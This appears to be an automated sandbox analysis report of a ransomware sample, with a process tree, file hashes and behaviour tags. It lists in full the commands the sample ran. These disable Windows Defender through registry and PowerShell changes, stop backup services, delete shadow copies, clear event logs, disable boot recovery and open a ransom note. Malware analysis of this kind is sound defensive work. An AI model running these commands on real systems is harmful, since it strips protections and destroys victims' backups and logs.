PID 3068 wrote to memory of 2388 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe reg.exe PID 3068 wrote to memory of 832 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe reg.exe PID 3068 wrote to memory of 832 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe reg.exe PID 3068 wrote to memory of 3948 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe reg.exe PID 3068 wrote to memory of 3948 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe"C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:4084
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2000
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2712
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2720
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:2196
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3484
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1752
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1892
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12cdb" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12cdb" /y3⤵PID:3828
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:3776
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:3724
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:884
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:3860
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:960
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2064
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2440
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1512
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12cdb" start= disabled2⤵PID:1736
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2008
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2176
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2388
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:832
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3948
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3740
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:980
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1796
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1692
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3980
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2560
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3184
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1984
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:364
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2712
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1184
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1256
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1088
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1328
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1288
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:3836
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1096
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:616
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3088
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:388 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:844 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2908 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1368
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1668
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:876
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2152
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2276 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2972
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1972 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2956 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4076 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3596 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1852 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4072 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3916
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4088 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3044 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2204
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2952 -
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\rFSH_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1196 -
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe"2⤵PID:528
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2564
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
f870881943d24780f2dbf4e977e6d7de
SHA1aa50b904f589b23167f312145965ea24fb5fd704
SHA256a4000e29572e1c189ac881d3780257389b1adcdfc92d4546785d51e1169eab31
SHA512d8535bcf40c33eafa3903a980cb0777cd32af833268f8d512a9f4fef5856c8208a7d57b197dc6829dfeaa8061cae59822e219954f83dc5028a6805fd59d54875
-
MD5
9feb836dd50f68cbf9e87dad21a2fbc4
SHA1f995609d7ea8a22383c8f28e2ac9b657fa767019
SHA256773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e
SHA512123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748